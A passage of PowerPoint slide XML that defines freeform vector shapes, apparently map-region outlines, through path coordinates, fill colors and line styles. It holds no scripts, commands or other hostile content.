                  <a:gd name="T66" fmla="*/ 71 w 77"/>
                  <a:gd name="T67" fmla="*/ 40 h 59"/>
                  <a:gd name="T68" fmla="*/ 73 w 77"/>
                  <a:gd name="T69" fmla="*/ 42 h 59"/>
                  <a:gd name="T70" fmla="*/ 76 w 77"/>
                  <a:gd name="T71" fmla="*/ 50 h 59"/>
                  <a:gd name="T72" fmla="*/ 77 w 77"/>
                  <a:gd name="T73" fmla="*/ 55 h 59"/>
                  <a:gd name="T74" fmla="*/ 75 w 77"/>
                  <a:gd name="T75" fmla="*/ 58 h 59"/>
                  <a:gd name="T76" fmla="*/ 72 w 77"/>
                  <a:gd name="T77" fmla="*/ 59 h 59"/>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77"/>
                  <a:gd name="T118" fmla="*/ 0 h 59"/>
                  <a:gd name="T119" fmla="*/ 77 w 77"/>
                  <a:gd name="T120" fmla="*/ 59 h 59"/>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77" h="59">
                    <a:moveTo>
                      <a:pt x="72" y="59"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="63" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="59"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36238" name="Freeform 371"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4010" y="2437"/>
                <a:ext cx="129" cy="73"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 16 w 129"/>
                  <a:gd name="T1" fmla="*/ 7 h 73"/>
                  <a:gd name="T2" fmla="*/ 20 w 129"/>
                  <a:gd name="T3" fmla="*/ 5 h 73"/>
                  <a:gd name="T4" fmla="*/ 23 w 129"/>
                  <a:gd name="T5" fmla="*/ 1 h 73"/>
                  <a:gd name="T6" fmla="*/ 32 w 129"/>
                  <a:gd name="T7" fmla="*/ 1 h 73"/>
                  <a:gd name="T8" fmla="*/ 39 w 129"/>
                  <a:gd name="T9" fmla="*/ 9 h 73"/>
                  <a:gd name="T10" fmla="*/ 48 w 129"/>
                  <a:gd name="T11" fmla="*/ 15 h 73"/>
                  <a:gd name="T12" fmla="*/ 52 w 129"/>
                  <a:gd name="T13" fmla="*/ 17 h 73"/>
                  <a:gd name="T14" fmla="*/ 58 w 129"/>
                  <a:gd name="T15" fmla="*/ 22 h 73"/>
                  <a:gd name="T16" fmla="*/ 66 w 129"/>
                  <a:gd name="T17" fmla="*/ 22 h 73"/>
                  <a:gd name="T18" fmla="*/ 66 w 129"/>
                  <a:gd name="T19" fmla="*/ 27 h 73"/>
                  <a:gd name="T20" fmla="*/ 79 w 129"/>
                  <a:gd name="T21" fmla="*/ 33 h 73"/>
                  <a:gd name="T22" fmla="*/ 80 w 129"/>
                  <a:gd name="T23" fmla="*/ 36 h 73"/>
                  <a:gd name="T24" fmla="*/ 87 w 129"/>
                  <a:gd name="T25" fmla="*/ 39 h 73"/>
                  <a:gd name="T26" fmla="*/ 93 w 129"/>
                  <a:gd name="T27" fmla="*/ 42 h 73"/>
                  <a:gd name="T28" fmla="*/ 96 w 129"/>
                  <a:gd name="T29" fmla="*/ 45 h 73"/>
                  <a:gd name="T30" fmla="*/ 101 w 129"/>
                  <a:gd name="T31" fmla="*/ 45 h 73"/>
                  <a:gd name="T32" fmla="*/ 103 w 129"/>
                  <a:gd name="T33" fmla="*/ 42 h 73"/>
                  <a:gd name="T34" fmla="*/ 111 w 129"/>
                  <a:gd name="T35" fmla="*/ 44 h 73"/>
                  <a:gd name="T36" fmla="*/ 119 w 129"/>
                  <a:gd name="T37" fmla="*/ 47 h 73"/>
                  <a:gd name="T38" fmla="*/ 124 w 129"/>
                  <a:gd name="T39" fmla="*/ 45 h 73"/>
                  <a:gd name="T40" fmla="*/ 129 w 129"/>
                  <a:gd name="T41" fmla="*/ 47 h 73"/>
                  <a:gd name="T42" fmla="*/ 126 w 129"/>
                  <a:gd name="T43" fmla="*/ 60 h 73"/>
                  <a:gd name="T44" fmla="*/ 127 w 129"/>
                  <a:gd name="T45" fmla="*/ 72 h 73"/>
                  <a:gd name="T46" fmla="*/ 120 w 129"/>
                  <a:gd name="T47" fmla="*/ 73 h 73"/>
                  <a:gd name="T48" fmla="*/ 115 w 129"/>
                  <a:gd name="T49" fmla="*/ 73 h 73"/>
                  <a:gd name="T50" fmla="*/ 110 w 129"/>
                  <a:gd name="T51" fmla="*/ 69 h 73"/>
                  <a:gd name="T52" fmla="*/ 100 w 129"/>
                  <a:gd name="T53" fmla="*/ 69 h 73"/>
                  <a:gd name="T54" fmla="*/ 92 w 129"/>
                  <a:gd name="T55" fmla="*/ 69 h 73"/>
                  <a:gd name="T56" fmla="*/ 90 w 129"/>
                  <a:gd name="T57" fmla="*/ 65 h 73"/>
                  <a:gd name="T58" fmla="*/ 84 w 129"/>
                  <a:gd name="T59" fmla="*/ 67 h 73"/>
                  <a:gd name="T60" fmla="*/ 77 w 129"/>
                  <a:gd name="T61" fmla="*/ 62 h 73"/>
                  <a:gd name="T62" fmla="*/ 73 w 129"/>
                  <a:gd name="T63" fmla="*/ 57 h 73"/>
                  <a:gd name="T64" fmla="*/ 68 w 129"/>
                  <a:gd name="T65" fmla="*/ 55 h 73"/>
                  <a:gd name="T66" fmla="*/ 60 w 129"/>
                  <a:gd name="T67" fmla="*/ 55 h 73"/>
                  <a:gd name="T68" fmla="*/ 53 w 129"/>
                  <a:gd name="T69" fmla="*/ 53 h 73"/>
                  <a:gd name="T70" fmla="*/ 51 w 129"/>
                  <a:gd name="T71" fmla="*/ 56 h 73"/>
                  <a:gd name="T72" fmla="*/ 43 w 129"/>
                  <a:gd name="T73" fmla="*/ 53 h 73"/>
                  <a:gd name="T74" fmla="*/ 38 w 129"/>
                  <a:gd name="T75" fmla="*/ 50 h 73"/>
                  <a:gd name="T76" fmla="*/ 29 w 129"/>
                  <a:gd name="T77" fmla="*/ 47 h 73"/>
                  <a:gd name="T78" fmla="*/ 18 w 129"/>
                  <a:gd name="T79" fmla="*/ 37 h 73"/>
                  <a:gd name="T80" fmla="*/ 8 w 129"/>
                  <a:gd name="T81" fmla="*/ 32 h 73"/>
                  <a:gd name="T82" fmla="*/ 0 w 129"/>
                  <a:gd name="T83" fmla="*/ 29 h 73"/>
                  <a:gd name="T84" fmla="*/ 2 w 129"/>
                  <a:gd name="T85" fmla="*/ 24 h 73"/>
                  <a:gd name="T86" fmla="*/ 3 w 129"/>
                  <a:gd name="T87" fmla="*/ 17 h 73"/>
                  <a:gd name="T88" fmla="*/ 5 w 129"/>
                  <a:gd name="T89" fmla="*/ 12 h 73"/>
                  <a:gd name="T90" fmla="*/ 15 w 129"/>
                  <a:gd name="T91" fmla="*/ 4 h 73"/>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29"/>
                  <a:gd name="T139" fmla="*/ 0 h 73"/>
                  <a:gd name="T140" fmla="*/ 129 w 129"/>
                  <a:gd name="T141" fmla="*/ 73 h 73"/>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29" h="73">
                    <a:moveTo>
                      <a:pt x="15" y="4"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="16" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="4"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36239" name="Freeform 372"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4010" y="2437"/>
                <a:ext cx="129" cy="73"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 16 w 129"/>
                  <a:gd name="T1" fmla="*/ 7 h 73"/>
                  <a:gd name="T2" fmla="*/ 20 w 129"/>
                  <a:gd name="T3" fmla="*/ 5 h 73"/>
                  <a:gd name="T4" fmla="*/ 23 w 129"/>
                  <a:gd name="T5" fmla="*/ 1 h 73"/>
                  <a:gd name="T6" fmla="*/ 32 w 129"/>
                  <a:gd name="T7" fmla="*/ 1 h 73"/>
                  <a:gd name="T8" fmla="*/ 39 w 129"/>
                  <a:gd name="T9" fmla="*/ 9 h 73"/>
                  <a:gd name="T10" fmla="*/ 48 w 129"/>
                  <a:gd name="T11" fmla="*/ 15 h 73"/>
                  <a:gd name="T12" fmla="*/ 52 w 129"/>
                  <a:gd name="T13" fmla="*/ 17 h 73"/>
                  <a:gd name="T14" fmla="*/ 58 w 129"/>
                  <a:gd name="T15" fmla="*/ 22 h 73"/>
                  <a:gd name="T16" fmla="*/ 66 w 129"/>
                  <a:gd name="T17" fmla="*/ 22 h 73"/>
                  <a:gd name="T18" fmla="*/ 66 w 129"/>
                  <a:gd name="T19" fmla="*/ 27 h 73"/>
                  <a:gd name="T20" fmla="*/ 79 w 129"/>
                  <a:gd name="T21" fmla="*/ 33 h 73"/>
                  <a:gd name="T22" fmla="*/ 80 w 129"/>
                  <a:gd name="T23" fmla="*/ 36 h 73"/>
                  <a:gd name="T24" fmla="*/ 87 w 129"/>
                  <a:gd name="T25" fmla="*/ 39 h 73"/>
                  <a:gd name="T26" fmla="*/ 93 w 129"/>
                  <a:gd name="T27" fmla="*/ 42 h 73"/>
                  <a:gd name="T28" fmla="*/ 96 w 129"/>
                  <a:gd name="T29" fmla="*/ 45 h 73"/>
                  <a:gd name="T30" fmla="*/ 101 w 129"/>
                  <a:gd name="T31" fmla="*/ 45 h 73"/>
                  <a:gd name="T32" fmla="*/ 103 w 129"/>
                  <a:gd name="T33" fmla="*/ 42 h 73"/>
                  <a:gd name="T34" fmla="*/ 111 w 129"/>
                  <a:gd name="T35" fmla="*/ 44 h 73"/>
                  <a:gd name="T36" fmla="*/ 119 w 129"/>
                  <a:gd name="T37" fmla="*/ 47 h 73"/>
                  <a:gd name="T38" fmla="*/ 124 w 129"/>
                  <a:gd name="T39" fmla="*/ 45 h 73"/>
                  <a:gd name="T40" fmla="*/ 129 w 129"/>
                  <a:gd name="T41" fmla="*/ 47 h 73"/>
                  <a:gd name="T42" fmla="*/ 126 w 129"/>
                  <a:gd name="T43" fmla="*/ 60 h 73"/>
                  <a:gd name="T44" fmla="*/ 127 w 129"/>
                  <a:gd name="T45" fmla="*/ 72 h 73"/>
                  <a:gd name="T46" fmla="*/ 120 w 129"/>
                  <a:gd name="T47" fmla="*/ 73 h 73"/>
                  <a:gd name="T48" fmla="*/ 115 w 129"/>
                  <a:gd name="T49" fmla="*/ 73 h 73"/>
                  <a:gd name="T50" fmla="*/ 110 w 129"/>
                  <a:gd name="T51" fmla="*/ 69 h 73"/>
                  <a:gd name="T52" fmla="*/ 100 w 129"/>
                  <a:gd name="T53" fmla="*/ 69 h 73"/>
                  <a:gd name="T54" fmla="*/ 92 w 129"/>
                  <a:gd name="T55" fmla="*/ 69 h 73"/>
                  <a:gd name="T56" fmla="*/ 90 w 129"/>
                  <a:gd name="T57" fmla="*/ 65 h 73"/>
                  <a:gd name="T58" fmla="*/ 84 w 129"/>
                  <a:gd name="T59" fmla="*/ 67 h 73"/>
                  <a:gd name="T60" fmla="*/ 77 w 129"/>
                  <a:gd name="T61" fmla="*/ 62 h 73"/>
                  <a:gd name="T62" fmla="*/ 73 w 129"/>
                  <a:gd name="T63" fmla="*/ 57 h 73"/>
                  <a:gd name="T64" fmla="*/ 68 w 129"/>
                  <a:gd name="T65" fmla="*/ 55 h 73"/>
                  <a:gd name="T66" fmla="*/ 60 w 129"/>
                  <a:gd name="T67" fmla="*/ 55 h 73"/>
                  <a:gd name="T68" fmla="*/ 53 w 129"/>
                  <a:gd name="T69" fmla="*/ 53 h 73"/>
                  <a:gd name="T70" fmla="*/ 51 w 129"/>
                  <a:gd name="T71" fmla="*/ 56 h 73"/>
                  <a:gd name="T72" fmla="*/ 43 w 129"/>
                  <a:gd name="T73" fmla="*/ 53 h 73"/>
                  <a:gd name="T74" fmla="*/ 38 w 129"/>
                  <a:gd name="T75" fmla="*/ 50 h 73"/>
                  <a:gd name="T76" fmla="*/ 29 w 129"/>
                  <a:gd name="T77" fmla="*/ 47 h 73"/>
                  <a:gd name="T78" fmla="*/ 18 w 129"/>
                  <a:gd name="T79" fmla="*/ 37 h 73"/>
                  <a:gd name="T80" fmla="*/ 8 w 129"/>
                  <a:gd name="T81" fmla="*/ 32 h 73"/>
                  <a:gd name="T82" fmla="*/ 0 w 129"/>
                  <a:gd name="T83" fmla="*/ 29 h 73"/>
                  <a:gd name="T84" fmla="*/ 2 w 129"/>
                  <a:gd name="T85" fmla="*/ 24 h 73"/>
                  <a:gd name="T86" fmla="*/ 3 w 129"/>
                  <a:gd name="T87" fmla="*/ 17 h 73"/>
                  <a:gd name="T88" fmla="*/ 5 w 129"/>
                  <a:gd name="T89" fmla="*/ 12 h 73"/>
                  <a:gd name="T90" fmla="*/ 15 w 129"/>
                  <a:gd name="T91" fmla="*/ 4 h 73"/>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29"/>
                  <a:gd name="T139" fmla="*/ 0 h 73"/>
                  <a:gd name="T140" fmla="*/ 129 w 129"/>
                  <a:gd name="T141" fmla="*/ 73 h 73"/>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29" h="73">
                    <a:moveTo>
                      <a:pt x="15" y="4"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="16" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
